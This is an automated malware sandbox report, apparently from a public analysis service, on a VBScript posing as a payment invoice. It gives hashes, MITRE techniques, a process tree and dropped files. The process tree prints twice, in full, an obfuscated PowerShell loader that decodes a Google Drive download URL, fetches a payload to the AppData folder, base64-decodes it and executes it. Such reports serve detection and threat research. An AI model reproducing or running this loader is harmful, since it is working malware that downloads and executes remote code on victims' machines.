f544eba4ca4d129edc8c944d9b236ea7b92c71c0085617fb43eb3a451681c3ff

General

Target

Outstanding Payment Invoice PO 3400375980.vbs
Size

279KB
MD5

4dbc97f8d5317c9d1dfacb195dbe6af7
SHA1

c50c88d61aed7ec85c31f18267bca471cf94065d
SHA256

f544eba4ca4d129edc8c944d9b236ea7b92c71c0085617fb43eb3a451681c3ff
SHA512

8a6ddaea7ce4dd6767fa309339e23b38e7f2b77e03e2d5111fe772195231c2ba09ade5a4d4def839204316d0a50d3315cdbab29d7d0e193dc8ce6fcec827b578
SSDEEP

6144:LmdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOKR8q3iQFw0:6nS2Im4WnPwp

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

4 3956 WScript.exe
30 3984 powershell.exe
32 3984 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

29 drive.google.com
30 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3768 3924 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

3984 powershell.exe
3984 powershell.exe
3924 powershell.exe
3924 powershell.exe
3924 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3984 powershell.exe
Token: SeDebugPrivilege 3924 powershell.exe

flow	pid	process
4	3956	WScript.exe
30	3984	powershell.exe
32	3984	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
29	drive.google.com
30	drive.google.com

pid	pid_target	process	target process
3768	3924	WerFault.exe	powershell.exe

pid	process
3984	powershell.exe
3984	powershell.exe
3924	powershell.exe
3924	powershell.exe
3924	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3924	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3956 wrote to memory of 3984	3956	WScript.exe	powershell.exe
PID 3956 wrote to memory of 3984	3956	WScript.exe	powershell.exe
PID 3984 wrote to memory of 4576	3984	powershell.exe	cmd.exe
PID 3984 wrote to memory of 4576	3984	powershell.exe	cmd.exe
PID 3984 wrote to memory of 3924	3984	powershell.exe	powershell.exe
PID 3984 wrote to memory of 3924	3984	powershell.exe	powershell.exe
PID 3984 wrote to memory of 3924	3984	powershell.exe	powershell.exe
PID 3924 wrote to memory of 4348	3924	powershell.exe	cmd.exe
PID 3924 wrote to memory of 4348	3924	powershell.exe	cmd.exe
PID 3924 wrote to memory of 4348	3924	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Outstanding Payment Invoice PO 3400375980.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5; $Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2 Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0 Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize ' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize 'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak% .rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPondfiUninffPuppefBunkre Ing.rSottaeStalknKoor tCompai chefapterotE,genoPresur DeclsOverl1Omfa 2Kager6 Besl)Itona ');$Intermewed=$Prmielaanenes198[0];Crooisite (Crystallize 'Triks$ClaivgtroldlNoncooRibbebStyrta Anval Fow.:rowd,S VrdipRoynieRe soj LivslSlanggEgoths ByggpWeakeaSprinnKrftsd BasneMu.ikn ,uposIneff=Pa,enNFeatheCharmw Afga-TvillOFutilbAftaljDraweeAppelc oligtGryde PrintSLiggeyRequis ExogtFyrste nstomWhite.ForsmN Ori eFdeput Unba.Ver,eW.aloneToitobTilkrCAfstrlDecariPrelaeRegrenAntirtAsse. ');Crooisite (Crystallize 'Pro t$samurS Pa,hpSelskeflounjarmielEthylg AftrsSkraap Brysa Auton s,padUn.aseFortonMomess.yphe.ErgonHstoryeVaticaVivisdVenn eAnhydrPote.sOmslu[Skrkr$ YnglCUnd toUnpenuKongensandhtDronne Unidrsparee.luttaMultirF.irct OsmahCogno]Kolle=,ceno$ FodtLSuperi L,cagBedsteBrugetAndani KronlInter ');$Traskendes31=Crystallize 'fintlSU licpAsepteFavorjMarinlTryklgChorisKreispGenneaBlaabn Ex.tdInd,ce Vil,n OpersEgord. joksDRu.leo VelswFrikanPansplR tiooBoobbacomp,dHighcFPolyciSidevlSamm.e.seud(Nrmel$HyphoIR ttenOve st Do.ue ElkhrS.ltdmDiakreP.ognwS nateSvaredGluci,norma$Ov,rrNTwisto ,dsknRi,nieDesmen periuTotalns nsacKna diReseraDelprtAfriviVindkvMo,kee Loqu6Alkoh9magis) Aneu ';$Traskendes31=$Olympiske[1]+$Traskendes31;$Nonenunciative69=$Olympiske[0];Crooisite (Crystallize ' Pala$ Un,mgUltralBlodpo PisobZygoga IndslGladi:Surm.sTilseu Nedik UntrkHabsbeReclarStrm,lModenare,rogsoupee DiplnRekap=monal(Ak.arTIndskeAnslas Affat arr-NatroP DukkaindictA tochre et Nahan$.rodeNBow.ioK.lhanBushfeCystinCoinmu.ydkunS gilcIn,aaiColumaWistst Lo.ui.lancvAvoceeSenil6Nskef9Gule.)Nerve ');while (!$sukkerlagen) {Crooisite (Crystallize ',rote$ ,rungspecilYvonnoSpirabFlippaStenllRab i:HandlwB,erboKarlsr Overk FloomCr oka Gavlt ForteSkade=Jamb.$Rement torhrKursuu kuske Del ') ;Crooisite $Traskendes31;Crooisite (Crystallize 'De enSPinxtt.riveaOphavr Borgt Elys-NoncuSPro.hlOut oeHoop,e NonmpGunni Fos 4Dis.u ');Crooisite (Crystallize ' Cato$ DreagPa,nolDelstoV,lgabStormaBildpl An.m:OsmolsReklau Til ksvenskPracteteletrMadagl Undia K.rsg Repre farvntidsb=Urban( TantT de.reQuerisgennetomve,- discP odboaK,aestChlorh Sten Miled$Fo,tsNKig.eoEngran Decoeundron MiniuRimptn pe ecAngioianticaInvest R adi Coz.vCaprieI der6Fjerd9 Cr.p) espe ') ;Crooisite (Crystallize 'Ve.te$BillegArb.jlZoophodiacebTempea CoeflSnild: ParaF Sta oF rbrrHyperkSup.aaDr llm selvmDa oye .pulrEspinsKemi.lUnc.aaCarrogBeridsFis,g=Misha$FlottgZanetl.omamo ultb,auriaavanglO,tag:PreroB T ngrSkoleu AbscgGastreDobber riedImpreeAs.utfPre.ai,ontunSangteE,maarBredbedes rt Opte+ Frem+ ,lum%selsk$hi,knPInd erDetalmG.aneiDefineFinanlNathaaTactiamilitnmil.seQuaesnA,neleInexpsdispo1 Fall9Super8i.sig.an,encInteroS kkeuMy,ctn omebt Extr ') ;$Intermewed=$Prmielaanenes198[$Forkammerslags];}Crooisite (Crystallize ' A.nd$LatedgMultil Pan,oCocktbAlbe.aReautl Iden:C,ingH EuryeBallesSvvnitprefiePrisph UdfyaTeosoaUkontrChroneForlftN nal Plut= Pave Tobi GBegite amestathei- StrsC OveroWasntn lovetC lloeUndernEmp rtMyoma Jazzb$hairdN RomboLod.enSvigeeAngivnForebuFolkendoctrc EuroiWardeaAnskrtSangbiEmbolvFlle e Ekvi6.iber9,okam ');Crooisite (Crystallize 'Jazzm$VerisgAlfonlK steo ShilbUphoaaJ,nssljeron:culliNFolkeeA,vormab.utaD,llitUndonoForsacKusk eSupperPhalaaGro n Nondi= Chre Felin[ ViljSAnchoycumulsAstert,sariePhle.mNglep.UoverCthai,oAffugnDisinv.ilteePris.rUd,vet Gift]Fi,de:Ind g:Slgt.FSerperLustroD,cipm Io oB bogsa Indts .rbeeUdvik6Udfri4 SundS Glact Kbenr EkspiSocion CelegStrad(Adso $Bart.HSeksae Vr ismirrotPhenyeAgnosh RefeaNormoa Sinor.unkeecoeditR,ets)Senes ');Crooisite (Crystallize 'Chu,c$.mbragLi otlOvervo.ovedb PulwaFo.lslR,jse:jewela Rk erRowt bLivede PlatjnonmedAtrioefejlfrIkonibSvible Pr,ifCatenoVidnelDiddekMagnenActiviFy dundis,ng DrameTen,urchaf nSubn,e treasOmfor Ariet=S,utt Cat,e[GudsfSDrukny Yaxcs ,turtKaarieSnvlemPunk,.Rec.sTNonexe De.oxDircht ,ane.WelleEsammenHensic ProboPrecodSaxboiB.trynOutprgInter]Intra: Kvin:BlockAKapitSRigsrCpickwIPeri.ISu.su..ffleGRemr eF,lketkompoSSpiritFylderEvangiUnscenplan,gSulte(inv,t$UniveN raae EmigmStgaaanilgatBils.odispocAfgife Hydrr SkndaImper)Vinke ');Crooisite (Crystallize 'Gener$,nprog ollelCy.oloMoralb,temnaFarmal Sti.:FursnPSemigrSele oRacebtAuramaIntagndekandP.tenrUrbicoUr,liu Bar sArbej=Lands$CaveraGiniarFeltmbUndereKundsj Spard.spsseVi gurKildrbAntihe StatfKaneloUrostlSanctk Ca nnSkiltiDec mn HawkgPariseNringr,enebnFlacoeKundesKhedi.SouthsUnimauFreskb AntisKomedtYoun.rNanogiDode.nHazelg ,ele( Frem3Sansn1Recip8Stikl3Farse5Dispr3hand ,Tilsl2Na,pa7Kom a4Protr7Sa le1Sprin) Pr,f ');Crooisite $Protandrous;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salvuyr.Qui && echo $"
3⤵
PID:4576

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Oildom = 1;$boatings='Substrin';$boatings+='g';Function Crystallize($Hjlpetropper){$Overloading=$Hjlpetropper.Length-$Oildom;For($Devastated=5; $Devastated -lt $Overloading; $Devastated+=(6)){$Bugging+=$Hjlpetropper.$boatings.Invoke($Devastated, $Oildom);}$Bugging;}function Crooisite($Ssterligt){. ($Rolfs) ($Ssterligt);}$Ligetil=Crystallize 'QuadrMNinevoPeberzBrandiGullilullmaldestiaC.res/Spere5Sesam.Gamma0dagsa E ekt(UnmetWOphngi Knobn Nonrd Synto evilwManersWhoop AspaN,neseTNgne. wakef1Hagls0Affyr.A,hol0Tran ;Storm .maasWSkippiSpisenth,rm6South4Skogg;Progr Bryllxvade,6Fiori4Goats;Dk,in PrearDaffsvDksbl:Maske1Balan2Rit,a1 Mort. Hand0 Lysb)Beglo GenreGNdrineStatucFdekakTo,nsoCherc/Klaus2 Lmwh0Prote1tofam0Sekti0 Fysi1Phot.0Co.pr1Behol KkkenFNemopiForaarUbereeudstefovermoAlderxLenca/Snebr1Au er2Do,rh1Verte. erma0 Scal ';$Counterearth=Crystallize 'DanisUDehorsmurd.eTeaserunexc-.ornlASkewlgMiilieseesanSprintTropa ';$Intermewed=Crystallize ' FlaghTvangtContrtT enepErhv,sSwitc:A,mbe/ Gala/BestydSkeerr Tandi unlivNaturepl,nt.HjfregRandsoInd so Hngeg WarblReveseUt.os.Unvehc incooUnfrum S,ns/tiltru TitacJeedh? Sk heFidusxWatchpki smoJagtbrA.ilat Jetw=,piredReereoVin awSekunnBrordlCircuo Ha aaFe tcdUdbed&Kerati ShandSnaph=Immor1 BilliL,gia- LillmFljteeSupra5C,mpusS,ldeG,ovemoApproPPrimu_ Ud.iYN merO,utvivEne.eASkalaY ch l3 InteoJewyrQParonNAutom7Soldican ib9Rekr.mHend,1A fyr9F,fth3Plu.k0,ille3Gamblj laguYS,adrsU.resTLeve. ';$Differentiators126=Crystallize 'Forsk> Anh. ';$Rolfs=Crystallize 'St diiTurbleDyb,exRumsk ';$Monismen = Crystallize ' Beliera agcAsfa hMarinot ito gttak% .rmma ForhpCaribpParapdZadrua,orintTransaKamik% hyli\Ethi.SUnrevaMa sel,paakvVejrpuDuckeyMelanrAcili.ModarQ Asteu fblei.uver Kon.&Alien&Ewaty ,ltereCarbrcTh,meh Ra do Catt bores$Su.me ';Crooisite (Crystallize 'For a$ skurgFugl,lFa,tgoMysidb FagtaV mellStvle:BesigO.proglD fogyBrawlmCa.orpWhystipl nesMusikkSu eneWinds= Beta(K,skbcLixinmNazibdKomme Over/Brolgc Nons Qu.n$TjetsMSkarroTilrenBelchiGrunds FritmfrembeGrften.ophe)Kredi ');Crooisite (Crystallize 'Sarac$PractgSnk,llPro noQualibP,ebeaOpfrilRadi :Tara POpererAnglimSco riPestreMonoclKennlaTjrslaunscinAcquie StornDe aseOzonlsillus1 B be9Subin8Hanhu= Tien$Atom.IloggenGa.gat vere,rougrSeptemKun te natuw ntime,iskedSpare.koglesH.espp KisslS,ftii rbejt tuea(Trafi$Dyv lDPondfiUninffPuppefBunkre Ing.rSottaeStalknKoor tCompai chefapterotE,genoPresur DeclsOverl1Omfa 2Kager6 Besl)Itona ');$Intermewed=$Prmielaanenes198[0];Crooisite (Crystallize 'Triks$ClaivgtroldlNoncooRibbebStyrta Anval Fow.:rowd,S VrdipRoynieRe soj LivslSlanggEgoths ByggpWeakeaSprinnKrftsd BasneMu.ikn ,uposIneff=Pa,enNFeatheCharmw Afga-TvillOFutilbAftaljDraweeAppelc oligtGryde PrintSLiggeyRequis ExogtFyrste nstomWhite.ForsmN Ori eFdeput Unba.Ver,eW.aloneToitobTilkrCAfstrlDecariPrelaeRegrenAntirtAsse. ');Crooisite (Crystallize 'Pro t$samurS Pa,hpSelskeflounjarmielEthylg AftrsSkraap Brysa Auton s,padUn.aseFortonMomess.yphe.ErgonHstoryeVaticaVivisdVenn eAnhydrPote.sOmslu[Skrkr$ YnglCUnd toUnpenuKongensandhtDronne Unidrsparee.luttaMultirF.irct OsmahCogno]Kolle=,ceno$ FodtLSuperi L,cagBedsteBrugetAndani KronlInter ');$Traskendes31=Crystallize 'fintlSU licpAsepteFavorjMarinlTryklgChorisKreispGenneaBlaabn Ex.tdInd,ce Vil,n OpersEgord. joksDRu.leo VelswFrikanPansplR tiooBoobbacomp,dHighcFPolyciSidevlSamm.e.seud(Nrmel$HyphoIR ttenOve st Do.ue ElkhrS.ltdmDiakreP.ognwS nateSvaredGluci,norma$Ov,rrNTwisto ,dsknRi,nieDesmen periuTotalns nsacKna diReseraDelprtAfriviVindkvMo,kee Loqu6Alkoh9magis) Aneu ';$Traskendes31=$Olympiske[1]+$Traskendes31;$Nonenunciative69=$Olympiske[0];Crooisite (Crystallize ' Pala$ Un,mgUltralBlodpo PisobZygoga IndslGladi:Surm.sTilseu Nedik UntrkHabsbeReclarStrm,lModenare,rogsoupee DiplnRekap=monal(Ak.arTIndskeAnslas Affat arr-NatroP DukkaindictA tochre et Nahan$.rodeNBow.ioK.lhanBushfeCystinCoinmu.ydkunS gilcIn,aaiColumaWistst Lo.ui.lancvAvoceeSenil6Nskef9Gule.)Nerve ');while (!$sukkerlagen) {Crooisite (Crystallize ',rote$ ,rungspecilYvonnoSpirabFlippaStenllRab i:HandlwB,erboKarlsr Overk FloomCr oka Gavlt ForteSkade=Jamb.$Rement torhrKursuu kuske Del ') ;Crooisite $Traskendes31;Crooisite (Crystallize 'De enSPinxtt.riveaOphavr Borgt Elys-NoncuSPro.hlOut oeHoop,e NonmpGunni Fos 4Dis.u ');Crooisite (Crystallize ' Cato$ DreagPa,nolDelstoV,lgabStormaBildpl An.m:OsmolsReklau Til ksvenskPracteteletrMadagl Undia K.rsg Repre farvntidsb=Urban( TantT de.reQuerisgennetomve,- discP odboaK,aestChlorh Sten Miled$Fo,tsNKig.eoEngran Decoeundron MiniuRimptn pe ecAngioianticaInvest R adi Coz.vCaprieI der6Fjerd9 Cr.p) espe ') ;Crooisite (Crystallize 'Ve.te$BillegArb.jlZoophodiacebTempea CoeflSnild: ParaF Sta oF rbrrHyperkSup.aaDr llm selvmDa oye .pulrEspinsKemi.lUnc.aaCarrogBeridsFis,g=Misha$FlottgZanetl.omamo ultb,auriaavanglO,tag:PreroB T ngrSkoleu AbscgGastreDobber riedImpreeAs.utfPre.ai,ontunSangteE,maarBredbedes rt Opte+ Frem+ ,lum%selsk$hi,knPInd erDetalmG.aneiDefineFinanlNathaaTactiamilitnmil.seQuaesnA,neleInexpsdispo1 Fall9Super8i.sig.an,encInteroS kkeuMy,ctn omebt Extr ') ;$Intermewed=$Prmielaanenes198[$Forkammerslags];}Crooisite (Crystallize ' A.nd$LatedgMultil Pan,oCocktbAlbe.aReautl Iden:C,ingH EuryeBallesSvvnitprefiePrisph UdfyaTeosoaUkontrChroneForlftN nal Plut= Pave Tobi GBegite amestathei- StrsC OveroWasntn lovetC lloeUndernEmp rtMyoma Jazzb$hairdN RomboLod.enSvigeeAngivnForebuFolkendoctrc EuroiWardeaAnskrtSangbiEmbolvFlle e Ekvi6.iber9,okam ');Crooisite (Crystallize 'Jazzm$VerisgAlfonlK steo ShilbUphoaaJ,nssljeron:culliNFolkeeA,vormab.utaD,llitUndonoForsacKusk eSupperPhalaaGro n Nondi= Chre Felin[ ViljSAnchoycumulsAstert,sariePhle.mNglep.UoverCthai,oAffugnDisinv.ilteePris.rUd,vet Gift]Fi,de:Ind g:Slgt.FSerperLustroD,cipm Io oB bogsa Indts .rbeeUdvik6Udfri4 SundS Glact Kbenr EkspiSocion CelegStrad(Adso $Bart.HSeksae Vr ismirrotPhenyeAgnosh RefeaNormoa Sinor.unkeecoeditR,ets)Senes ');Crooisite (Crystallize 'Chu,c$.mbragLi otlOvervo.ovedb PulwaFo.lslR,jse:jewela Rk erRowt bLivede PlatjnonmedAtrioefejlfrIkonibSvible Pr,ifCatenoVidnelDiddekMagnenActiviFy dundis,ng DrameTen,urchaf nSubn,e treasOmfor Ariet=S,utt Cat,e[GudsfSDrukny Yaxcs ,turtKaarieSnvlemPunk,.Rec.sTNonexe De.oxDircht ,ane.WelleEsammenHensic ProboPrecodSaxboiB.trynOutprgInter]Intra: Kvin:BlockAKapitSRigsrCpickwIPeri.ISu.su..ffleGRemr eF,lketkompoSSpiritFylderEvangiUnscenplan,gSulte(inv,t$UniveN raae EmigmStgaaanilgatBils.odispocAfgife Hydrr SkndaImper)Vinke ');Crooisite (Crystallize 'Gener$,nprog ollelCy.oloMoralb,temnaFarmal Sti.:FursnPSemigrSele oRacebtAuramaIntagndekandP.tenrUrbicoUr,liu Bar sArbej=Lands$CaveraGiniarFeltmbUndereKundsj Spard.spsseVi gurKildrbAntihe StatfKaneloUrostlSanctk Ca nnSkiltiDec mn HawkgPariseNringr,enebnFlacoeKundesKhedi.SouthsUnimauFreskb AntisKomedtYoun.rNanogiDode.nHazelg ,ele( Frem3Sansn1Recip8Stikl3Farse5Dispr3hand ,Tilsl2Na,pa7Kom a4Protr7Sa le1Sprin) Pr,f ');Crooisite $Protandrous;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Salvuyr.Qui && echo $"
4⤵
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 2556
4⤵
- Program crash
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3924 -ip 3924
1⤵
PID:5036

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tzel3cqs.nyv.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Salvuyr.Qui
Filesize
450KB

MD5
56863140c25c372b602fac03f8bf78a1

SHA1
9e3ba6deef83029aae67321d35d82ca7f6ebccc8

SHA256
ff38b3267ae77b83c8a840d8c838261d9890451cbd87c5c083667d67b65f7da9

SHA512
aabe7c92c5d4ea050caf65e9e3b2a191103487a6a70c2685978c30d6486af694e5435b89957551c1f2bcf66011ec5a6dec0d57045ab32b0f1cb727c9975d82a2

Download Submit
memory/3924-24-0x0000000005CF0000-0x0000000005D56000-memory.dmp

Filesize
408KB

Download
memory/3924-39-0x0000000006A30000-0x0000000006A4A000-memory.dmp

Filesize
104KB

Download
memory/3924-25-0x0000000005D60000-0x0000000005DC6000-memory.dmp

Filesize
408KB

Download
memory/3924-44-0x0000000074EC0000-0x0000000075670000-memory.dmp

Filesize
7.7MB

Download
memory/3924-18-0x0000000002B70000-0x0000000002BA6000-memory.dmp

Filesize
216KB

Download
memory/3924-19-0x0000000074EC0000-0x0000000075670000-memory.dmp

Filesize
7.7MB

Download
memory/3924-20-0x0000000005080000-0x0000000005090000-memory.dmp

Filesize
64KB

Download
memory/3924-21-0x0000000005080000-0x0000000005090000-memory.dmp

Filesize
64KB

Download
memory/3924-22-0x00000000056C0000-0x0000000005CE8000-memory.dmp

Filesize
6.2MB

Download
memory/3924-35-0x0000000005F70000-0x00000000062C4000-memory.dmp

Filesize
3.3MB

Download
memory/3924-42-0x0000000008910000-0x0000000008EB4000-memory.dmp

Filesize
5.6MB

Download
memory/3924-41-0x00000000076D0000-0x00000000076F2000-memory.dmp

Filesize
136KB

Download
memory/3924-23-0x00000000055E0000-0x0000000005602000-memory.dmp

Filesize
136KB

Download
memory/3924-36-0x0000000006490000-0x00000000064AE000-memory.dmp

Filesize
120KB

Download
memory/3924-37-0x00000000064D0000-0x000000000651C000-memory.dmp

Filesize
304KB

Download
memory/3924-38-0x0000000007CE0000-0x000000000835A000-memory.dmp

Filesize
6.5MB

Download
memory/3924-40-0x0000000007740000-0x00000000077D6000-memory.dmp

Filesize
600KB

Download
memory/3984-13-0x000001A3C1EE0000-0x000001A3C1EF0000-memory.dmp

Filesize
64KB

Download
memory/3984-47-0x00007FFFF7AB0000-0x00007FFFF8571000-memory.dmp

Filesize
10.8MB

Download
memory/3984-14-0x000001A3C1EE0000-0x000001A3C1EF0000-memory.dmp

Filesize
64KB

Download
memory/3984-11-0x000001A3C2090000-0x000001A3C20B2000-memory.dmp

Filesize
136KB

Download
memory/3984-17-0x000001A3C1EE0000-0x000001A3C1EF0000-memory.dmp

Filesize
64KB

Download
memory/3984-12-0x00007FFFF7AB0000-0x00007FFFF8571000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing